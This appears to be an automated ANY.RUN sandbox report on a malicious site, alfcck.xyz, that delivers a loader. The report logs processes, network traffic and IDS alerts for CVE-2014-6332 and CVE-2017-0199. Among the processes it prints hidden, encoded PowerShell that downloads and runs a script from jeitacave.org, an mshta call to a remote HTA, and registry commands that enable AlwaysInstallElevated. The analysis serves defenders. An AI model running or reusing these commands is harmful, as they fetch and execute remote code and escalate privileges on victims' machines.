URL: | http://alfcck.xyz/ |
Full analysis: | https://app.any.run/tasks/1bec8c96-4692-4b2e-bf58-ab57e5c8baf4 |
Verdict: | Malicious activity |
Threats: | A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection. |
Analysis date: | September 19, 2019, 07:19:46 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MD5: | 004D831EF62DF81933AE190163A41F8E |
SHA1: | 0B26FA162CFE81385DA307EEB2331F1CADD7118F |
SHA256: | 31F581CC5A5AE9CE187B6D901C1934077EE849E5D06F9164BF07994F03CD986D |
SSDEEP: | 3:N1Kffkdci:CnUci |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
3552 | "C:\Program Files\Internet Explorer\iexplore.exe" -nohome | C:\Program Files\Internet Explorer\iexplore.exe | explorer.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Internet Explorer Version: 8.00.7600.16385 (win7_rtm.090713-1255) | ||||
3868 | "C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:3552 CREDAT:71937 | C:\Program Files\Internet Explorer\iexplore.exe | iexplore.exe | |
User: admin Company: Microsoft Corporation Integrity Level: LOW Description: Internet Explorer Version: 8.00.7600.16385 (win7_rtm.090713-1255) | ||||
2700 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -windowstyle hidden -exec bypass -EncodedCommand DQAKAEkARQBYACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvAGoAZQBpAHQAYQBjAGEAdgBlAC4AbwByAGcALwBwAHMAMAAwADEALgBqAHAAZwAnACkADQAKAA== | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | iexplore.exe |
User: admin Company: Microsoft Corporation Integrity Level: LOW Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3300 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -windowstyle hidden -exec bypass -EncodedCommand DQAKAEkARQBYACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvAGoAZQBpAHQAYQBjAGEAdgBlAC4AbwByAGcALwBwAHMAMAAwADEALgBqAHAAZwAnACkADQAKAA== | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | iexplore.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
1792 | mshta http://jeitacave.org/hta.hta | C:\Windows\system32\mshta.exe | iexplore.exe | |
User: admin Company: Microsoft Corporation Integrity Level: LOW Description: Microsoft (R) HTML Application host Exit code: 0 Version: 8.00.7600.16385 (win7_rtm.090713-1255) | ||||
4016 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -windowstyle hidden -exec bypass -nop -windowstyle hidden -exec bypass -EncodedCommand DQAKAEkARQBYACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvAGoAZQBpAHQAYQBjAGEAdgBlAC4AbwByAGcALwBwAHMAMAAwADEALgBqAHAAZwAnACkADQAKAA== | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | mshta.exe | |
User: admin Company: Microsoft Corporation Integrity Level: LOW Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3840 | "C:\Windows\System32\Eventvwr.exe" | C:\Windows\System32\Eventvwr.exe | — | powershell.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Event Viewer Snapin Launcher Exit code: 3221226540 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3032 | "C:\Windows\System32\Eventvwr.exe" | C:\Windows\System32\Eventvwr.exe | powershell.exe | |
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Event Viewer Snapin Launcher Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3912 | "cmd.exe" /c reg add HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated /t REG_DWORD /d 00000001 /f® add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated /t REG_DWORD /d 00000001 /f | C:\Windows\system32\cmd.exe | — | Eventvwr.exe |
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3148 | reg add HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated /t REG_DWORD /d 00000001 /f | C:\Windows\system32\reg.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Registry Console Tool Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
3552 | iexplore.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\LH043OAM\favicon[1].ico | — | |
MD5:— | SHA256:— | |||
3552 | iexplore.exe | C:\Users\admin\AppData\LocalLow\Microsoft\Internet Explorer\Services\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico | — | |
MD5:— | SHA256:— | |||
3300 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\1BBJB4T09HGVNP9R19V6.temp | — | |
MD5:— | SHA256:— | |||
1520 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ZA9GU7FBZYJS9J6EAXHL.temp | — | |
MD5:— | SHA256:— | |||
2916 | csc.exe | C:\Users\admin\AppData\Local\Temp\CSCB9BB.tmp | — | |
MD5:— | SHA256:— | |||
2916 | csc.exe | C:\Users\admin\AppData\Local\Temp\iels5yar.pdb | — | |
MD5:— | SHA256:— | |||
3908 | cvtres.exe | C:\Users\admin\AppData\Local\Temp\RESB9BC.tmp | — | |
MD5:— | SHA256:— | |||
2916 | csc.exe | C:\Users\admin\AppData\Local\Temp\iels5yar.dll | — | |
MD5:— | SHA256:— | |||
2916 | csc.exe | C:\Users\admin\AppData\Local\Temp\iels5yar.out | — | |
MD5:— | SHA256:— | |||
3868 | iexplore.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\index.dat | dat | |
MD5:1543619E2B733B088798D7D0B70374E6 | SHA256:D387B52DEE27A6B407D13E2910326A83A9647053297CD85E8C75439E21209EF9 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
3868 | iexplore.exe | GET | 404 | 104.24.112.108:80 | http://alfcck.xyz/cdn-cgi/apps/head/xGpmLMHiaqCy-agu1ud6fHqKiTo.js | US | — | — | malicious |
3868 | iexplore.exe | GET | 200 | 104.24.112.108:80 | http://alfcck.xyz/3.htm | US | text | 458 b | malicious |
3868 | iexplore.exe | GET | 200 | 104.24.112.108:80 | http://alfcck.xyz/ | US | html | 7.60 Kb | malicious |
3300 | powershell.exe | GET | 200 | 104.28.18.126:80 | http://jeitacave.org/ps001.jpg | US | text | 81.6 Kb | malicious |
1792 | mshta.exe | GET | 200 | 104.28.18.126:80 | http://jeitacave.org/hta.hta | US | html | 466 b | malicious |
4092 | msiexec.exe | GET | 200 | 104.28.18.126:80 | http://jeitacave.org/1U22nOJHFdDmYcgCS.jpg | US | executable | 3.43 Mb | malicious |
4016 | powershell.exe | GET | 200 | 104.28.18.126:80 | http://jeitacave.org/ps001.jpg | US | text | 81.6 Kb | malicious |
3552 | iexplore.exe | GET | 200 | 204.79.197.200:80 | http://www.bing.com/favicon.ico | US | image | 237 b | whitelisted |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3552 | iexplore.exe | 204.79.197.200:80 | www.bing.com | Microsoft Corporation | US | whitelisted |
3868 | iexplore.exe | 104.24.112.108:80 | alfcck.xyz | Cloudflare Inc | US | shared |
1792 | mshta.exe | 104.28.18.126:80 | jeitacave.org | Cloudflare Inc | US | shared |
— | — | 104.24.112.108:80 | alfcck.xyz | Cloudflare Inc | US | shared |
3300 | powershell.exe | 104.28.18.126:80 | jeitacave.org | Cloudflare Inc | US | shared |
4016 | powershell.exe | 104.28.18.126:80 | jeitacave.org | Cloudflare Inc | US | shared |
4092 | msiexec.exe | 104.28.18.126:80 | jeitacave.org | Cloudflare Inc | US | shared |
Domain | IP | Reputation |
---|---|---|
www.bing.com |
| whitelisted |
alfcck.xyz |
| malicious |
jeitacave.org |
| malicious |
PID | Process | Class | Message |
---|---|---|---|
3868 | iexplore.exe | Potentially Bad Traffic | AV INFO HTTP Request to a *.xyz domain |
3868 | iexplore.exe | Attempted User Privilege Gain | ET WEB_CLIENT Possible Internet Explorer VBscript failure to handle error case information disclosure CVE-2014-6332 Percent Hex Encode |
3868 | iexplore.exe | Attempted User Privilege Gain | ET EXPLOIT Possible Internet Explorer VBscript failure to handle error case information disclosure CVE-2014-6332 Common Function Name |
3868 | iexplore.exe | Attempted User Privilege Gain | ET EXPLOIT Possible Internet Explorer VBscript failure to handle error case information disclosure CVE-2014-6332 Common Construct Hex Encode |
3868 | iexplore.exe | Attempted Administrator Privilege Gain | ET EXPLOIT Possible Internet Explorer VBscript failure to handle error case information disclosure CVE-2014-6332 Common Construct M2 |
3868 | iexplore.exe | A Network Trojan was detected | ET TROJAN Possibly Malicious Base64 Unicode WebClient DownloadString M3 |
3868 | iexplore.exe | Potentially Bad Traffic | AV INFO HTTP Request to a *.xyz domain |
1792 | mshta.exe | Potentially Bad Traffic | ET POLICY Possible HTA Application Download |
1792 | mshta.exe | Attempted User Privilege Gain | ET CURRENT_EVENTS SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl |
1792 | mshta.exe | A Network Trojan was detected | ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199) |
Process | Message |
---|---|
csc.exe |
*** HR originated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
|
csc.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
|
csc.exe |
*** HR originated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
|
csc.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
|
csc.exe |
*** HR originated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
|
csc.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
|
csc.exe |
*** HR originated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
|
csc.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
|
csc.exe |
*** HR originated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
|
csc.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
|